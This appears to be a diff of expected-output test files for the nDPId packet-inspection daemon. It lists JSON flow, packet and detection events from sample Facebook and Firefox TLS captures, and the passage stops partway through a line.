00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1472393123682,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1472393123682,"pkt":"MFLLbJwbmAyC0zx8CABFAAA8AABAAFMGxtAfDVYkwKgrEgG7rkZw6dh2LwEoPqASNpwMewAAAgQFeAQCCAolRdDWAEtdIAEDAwg="}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1472393123682,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1472393123682,"pkt":"mAyC0zx8MFLLbJwbCABFAAA0dR5AAEAGZLrAqCsSHw1WJK5GAbsvASg+cOnYd4AQAOVhEgAAAQEICgBLXUglRdDW"}
00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1472393123550,"flow_last_seen":1472393123683,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1472393123683,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"31.13.86.36","src_port":44614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.facebook.com","ja3":"5c60e71f1b8cd40e4d40ed5b6d666e3f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,spdy\/3.1,http\/1.1"}}
00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1472393123550,"flow_last_seen":1472393123838,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1472393123838,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"31.13.86.36","src_port":44614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.facebook.com","ja3":"5c60e71f1b8cd40e4d40ed5b6d666e3f","ja3s":"96681175a9547081bf3d417f1a572091","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,spdy\/3.1,http\/1.1"}}
00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":60,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1472393122365,"flow_last_seen":1472393123665,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":4475,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":1472393124229,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":60,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":41,"flow_first_seen":1472393123550,"flow_last_seen":1472393124229,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":22044,"flow_avg_l4_payload_len":537,"midstream":0,"thread_ts_msec":1472393124229,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"31.13.86.36","src_port":44614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":60,"source":"facebook.pcap","alias":"nDPId-test","packets-captured":60,"packets-processed":60,"total-skipped-flows":0,"total-l4-data-len":26519,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":3,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":18,"global_ts_msec":1472393124229}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 60/60

84
test/results/firefox.pcap.out
View File

@@ -1,47 +1,47 @@
00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"firefox.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"firefox.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1620927997754}
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927997754,"flow_last_seen":1620927997754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620927997754,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51577,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1620927997754,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620927997754,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6Esl5AbuZmizAAAAAALAC\/\/9OVwAAAgQFtAEDAwUBAQgKNAyUbQAAAAAEAgAA"}
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1620927997781,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620927997781,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yXkJiZGFmZoswaAS\/oiCawAAAgQFrAQCCAo8IAcuNAyUbQEDAwc="}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1620927997781,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620927997781,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6Esl5AbuZmizBCYmRhoAQECyfcgAAAQEICjQMlIc8IAcu"}
00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927997754,"flow_last_seen":1620927997782,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1620927997782,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927997754,"flow_last_seen":1620927997814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1620927997814,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927998782,"flow_last_seen":1620927998782,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620927998782,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51583,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1620927998782,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620927998782,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6Esl\/AbveSGQcAAAAALAC\/\/\/OTgAAAgQFtAEDAwUBAQgKNAyYZQAAAAAEAgAA"}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927998806,"flow_last_seen":1620927998806,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620927998806,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1620927998806,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620927998806,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EsmEAbtCftk8AAAAALAC\/\/\/03wAAAgQFtAEDAwUBAQgKNAyYeQAAAAAEAgAA"}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1620927998817,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620927998817,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yX\/JSxfE3khkHaAS\/oi4VgAAAgQFrAQCCAo8IAs5NAyYZQEDAwc="}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1620927998817,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620927998817,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6Esl\/AbveSGQdyUsXxYAQECzVWgAAAQEICjQMmII8IAs5"}
00876{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927998782,"flow_last_seen":1620927998820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927998820,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51583,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1620927998833,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620927998833,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yYRFBnlrQn7ZPaAS\/ogBdQAAAgQFrAQCCAo8IAtKNAyYeQEDAwc="}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1620927998833,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620927998833,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EsmEAbtCftk9RQZ5bIAQECwefwAAAQEICjQMmJA8IAtK"}
00876{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927998806,"flow_last_seen":1620927998850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927998850,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
00915{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927998782,"flow_last_seen":1620927998850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927998850,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51583,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
00915{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":68,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927998806,"flow_last_seen":1620927998877,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927998877,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927999109,"flow_last_seen":1620927999109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620927999109,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51599,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1620927999109,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620927999109,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EsmPAbugsPXqAAAAALAC\/\/947AAAAgQFtAEDAwUBAQgKNAyZgQAAAAAEAgAA"}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927999111,"flow_last_seen":1620927999111,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620927999111,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51600,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1620927999111,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620927999111,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EsmQAbsCvXBwAAAAALAC\/\/+cWAAAAgQFtAEDAwUBAQgKNAyZggAAAAAEAgAA"}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":86,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927999112,"flow_last_seen":1620927999112,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620927999112,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51601,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1620927999112,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620927999112,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EsmRAbvLRPiuAAAAALAC\/\/9LkAAAAgQFtAEDAwUBAQgKNAyZgwAAAAAEAgAA"}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1620927999138,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620927999138,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yY9yeaT2oLD166AS\/ogrVAAAAgQFrAQCCAo8IAx5NAyZgQEDAwc="}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1620927999138,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620927999138,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yZBJLtVRAr1wcaAS\/ohHrwAAAgQFrAQCCAo8IAx6NAyZggEDAwc="}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1620927999138,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620927999138,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EsmPAbugsPXrcnmk94AQECxIWgAAAQEICjQMmZw8IAx5"}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1620927999138,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620927999138,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EsmQAbsCvXBxSS7VUoAQECxktgAAAQEICjQMmZw8IAx6"}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1620927999140,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620927999140,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yZFyBGfZy0T4r6AS\/og7hgAAAgQFrAQCCAo8IAx9NAyZgwEDAwc="}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1620927999140,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620927999140,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EsmRAbvLRPivcgRn2oAQECxYiwAAAQEICjQMmZ88IAx9"}
00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927999111,"flow_last_seen":1620927999141,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927999141,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51600,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":125,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927999109,"flow_last_seen":1620927999143,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927999143,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51599,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":126,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927999112,"flow_last_seen":1620927999148,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927999148,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51601,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 